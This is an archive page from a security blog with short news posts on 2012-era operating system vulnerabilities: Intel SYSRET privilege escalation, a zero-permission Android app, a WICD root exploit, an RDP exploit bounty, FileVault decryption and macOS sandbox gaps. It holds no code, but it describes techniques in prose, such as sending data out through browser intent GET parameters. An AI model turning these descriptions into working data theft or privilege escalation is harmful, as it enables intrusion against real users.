Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label OS Vulnerability. Show all posts
Vulnerability
Featured OS Vulnerability Vulnerability

64-bit OS & virtualization software running on Intel CPU vulnerable to local privilege escalation


A critical security vulnerability has been discovered in the 64 bit operating system and virtualization software running on Intel CPU , which leads to privilege Escalation exploit or a guest-to-host virtual machine escape.

The problem affects 64-bit versions of Windows, Linux, FreeBSD and the Xen hypervisor. The flaw seems to only affect Intel hardware – AMDand ARM CPUs are not affected.

"A ring3 attacker may be able to specifically craft a stack frame to be executed by ring0 (kernel) after a general protection exception (#GP)."US-CERT's vulnerability report reads.

" The fault will be handled before the stack switch, which means the exception handler will be run at ring0 with an attacker's chosen RSP causing a privilege escalation. "

Metasploit penetration testing framework founder H.D. Moore characterized the bug as a "serious guest-to-host escape vulnerability," noting that while it affects the Xen platform, it doesn't affect VMware.

To this end, operating system specific details on the vulnerability have been published by Xen, FreeBSD and Microsoft. Linux vendor Red Hat has also published two updates on the problem: RHSA-2012:0720-1 and RHSA-2012:0721-1.

To close the security hole, users should apply updates from their operating system supplier.
Read more »
Vulnerability
Featured OS Vulnerability Vulnerability

'No permissions' Android app can access sensitive data


A security researcher ,Paul Brodeur, from Leviathan Security Group, has created a proof-of-concept app called "No Permissions" that demonstrate how an android application which doesn't ask for any security permission is still able to access to your sensitive data.

Usually, whenever android user try to install an app, a screen will be displayed to asks users to approve the permission requested by app. The purpose of Android Permissions is to let you know exactly what information an app maker is harvesting from your device, so you can make an informed decision over whether or not you want to install it. An app needs your permission to do even trivial tasks like performing network access, keeping the device awake.

According to Paul's research, even an Android app with zero permissions are able to access the sensitive  data from your devices. His app which doesn't ask for any permissions is still able to access files on SD card, files stored by other apps and handset identification data.

In order to send collected information to the criminal, app will need INTERNET permission. Unfortunately, there is one network call that can be made without any permissions.

"the URI ACTION_VIEW Intent opens a browser. By passing data via GET parameters in a URI, the browser will exfiltrate any collected data. In my tests, I found that the app is able to launch the browser even after it has lost focus, allowing for transmission of large amounts of data by creating successive browser calls." researcher explained.

He tested the app against Android 4.0.3 and Android 2.3.5.  If you are curious to know the capabilities of the app, then you can download it from here.
Read more »
Vulnerability
Breaking News OS Vulnerability Vulnerability

WICD privilege escalation 0day affects Backtrack Linux

A student from Infosec Institute managed to find a zero-day vulnerability in Wireless Interface Connection Daemon(WICD) affecting the Backtrack 5.

The discovery has been published on InfoSec's own website and detailed by the student himself, who says that the Wireless Interface Connection Daemon (WICD) has several design flaws that can be misused to execute a privilege escalation exploit.

Improper sanitization of the inputs in the WICD's DBUS interfaces allows an attacker to (semi)arbitrarily write configuration options in WICD's 'wireless-settings.conf' file, including but not limited to defining scripts (executables actually) to execute upon various internal events (for instance upon connecting to a wireless network).

These scripts execute as the root user, this leads to arbitrary code/command execution by an attacker with access to the WICD DBUS interface as the root user.
At the first , researchers incorrectly named the vulnerability as "Backtrack 5 R2 priv escalation 0day ".  Later realized the mistake and change the name to "wicd Privilege Escalation 0Day". They apologized for the confusion to the Backtrack team and any other persons affected by this error.


"To summarise, we believe that the intentional misrepresentation of this bug report has discredited BackTrack unecessarily in the eyes of those who do not understand the underlying mechanisms of our OS, and also discredited the Infosec Institute in the eyes of those who do." Backtrack commented on this issue. 
The wicd team has released a new version that fixes this bug (CVE-2012-2095).
Read more »
Vulnerability
Exploits OS Vulnerability Vulnerability

Hackers developed Exploit code for RDP vulnerability


Chinese Hackers have released a proof of concept[POC] code that tries to exploit the recently patched windows RDP vulnerability. When Microsoft released the patch for RDP vulnerability, they urged customers to update their product as soon as possible, especially since they were expecting that an exploit would be developed in the next 30 days. But, Hackers took less than three days and released a working POC.

SophosLabs researchers found one Chinese website has exploit code written in Python scripts. The code attempts to exploit the MS12-020 RDP vulnerability and causes Windows computers to blue screen.

Even though the script only cause a blue screen death for now, the hackers wont' take long time to develop the exploit to produce a fast-spreading internet worm.

Also researchers come across a fake exploits for the Microsoft RDP vulnerability that claims to be the Python script of a worm .  "It references a Python module that doesn't exist (FreeRDP), and claims to be written by sabu@fbi.gov, an obvious reference to the high profile Anonymous hacker who was recently revealed to have been secretly working for the FBI for months."Researcher said.

Read more »
Vulnerability
Breaking News OS Vulnerability Vulnerability

Hackers offer more than 1400$ for developing windows RDP exploit


A website called gun.io , where software developers can hire each other , has an ad that promise to award more than $1400(currently it is $1451) to the first person who develop working exploit for the windows RDP vulnerability.

As it is listed as Open source bounty , the reward will increase each passing day. Security journalist Brian Krebs came across this website, the bounty is $1,435.


Microsoft already patched this vulnerability and urged users to update their product. However lot of users fail to update , which is why cyber criminals are rushing to get a working exploit released.

"I'd like to see a working exploit for CVE-2012-0002 (the new RDP hole) as a Metasploit module." a user named Rich said.

Krebs said that the current bounty offered for the exploit is almost certainly far less than the price such a weapon could command the underground market, or even what a legitimate vulnerability research company like TippingPoint might pay for such research.
Read more »
OS Vulnerability
Application Vulnerability Featured Mac OS X Hacks OS Vulnerability

Forensics Vendor Passware warns Mac OS X FileVault 2 easily decrypted

Passware, Inc., a provider of password recovery for law enforcement, issued a warning that its Forensic Tools capable of breaking the Disk encryption security in Mac OS.

FileVault provides 128bit AES encryption of all files located within your home directory of Mac OS X. A master password (and recovery key in 10.7+) is created as a precaution against a user losing their password.

Passware Kit Forensic v11.3: can decrypt the a FileVault-encrypted Mac disk within 40 minutes-regardless of the length or complexity of the password. Passware says its utilities can now easily gain a FileVault encryption key from the target computer memory, which provides full access to the encrypted Mac hard disk.


“Full disk encryption is becoming a major obstacle for digital investigations,” said Dmitry Sumin, president, Passware, Inc. “The latest version of Passware Kit Forensic offers multiple approaches to overcoming this problem, such as live memory analysis and extraction of encryption keys for BitLocker, TrueCrypt, and FileVault. This means forensic experts are better armed to approach investigative
challenges with an effective and efficient solution that significantly reduces decryption time and thus allows investigators to focus on data analysis."

Passware Kit Forensic is available directly from Passware for $995 with one year of free updates. PassWare makes this software primarily available for law enforcement.
Read more »
Vulnerability
Breaking News OS Vulnerability Vulnerability

Critical Zero-Day Vulnerability found in 64 bit version of Windows 7

webDEViL,a Security Researcher from Secunia discovered a new Zero-day vulnerability in 64 bit version of Windows 7 that allows an attacker to compromise the vulnerable machine.

A Researcher w3bd3vil shared a tweet in Twitter that he discovered a vulnerability that a method for exploiting the vulnerability by simply feeding an iframe with an overly large height to Safari.


"The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large "height" attribute viewed using the Apple Safari browser.

Successful exploitation may allow execution of arbitrary code with kernel-mode privileges." Secunia report says.


Read more »
Vulnerability
Apple Hacked Mac OS X Hacks OS Vulnerability Vulnerability

Critical Vulnerability found in Apple Mac OS X Sandbox Mechanisms


CoreLabs Researchers discovered critical Vulnerability in Mac OS X's sandboxing mechanisms.They published the Advisory information on Nov 10,2011.

Vulnerability Description

Several of the default pre-defined sandbox profiles don't properly limit all the available mechanisms and therefore allow exercising part of the restricted functionality. Namely, sending Apple events is possible within the no-network sandbox (kSBXProfileNoNetwork). A compromised application hypothetically restricted by the use of the no-network profile may have access to network resources through the use of Apple events to invoke the execution of other applications not directly restricted by the sandbox.

It is worth mentioning that a similar issue was reported by Charlie Miller in his talk at Black Hat Japan 2008 . He mentioned a few processes sandboxed by default as well as a method to circumvent the protection. Sometime after the talk, Apple modified the mentioned profiles by restricting the use of Apple events but did not modify the generic profiles.

According to the Advisory,Apple Mac OS X 10.7.x,10.6.x,10.5.x are vulnerable .

Apple Mac OS X 10.4 is non-vulnerable. 


Read more »
Subscribe to: Posts (Atom)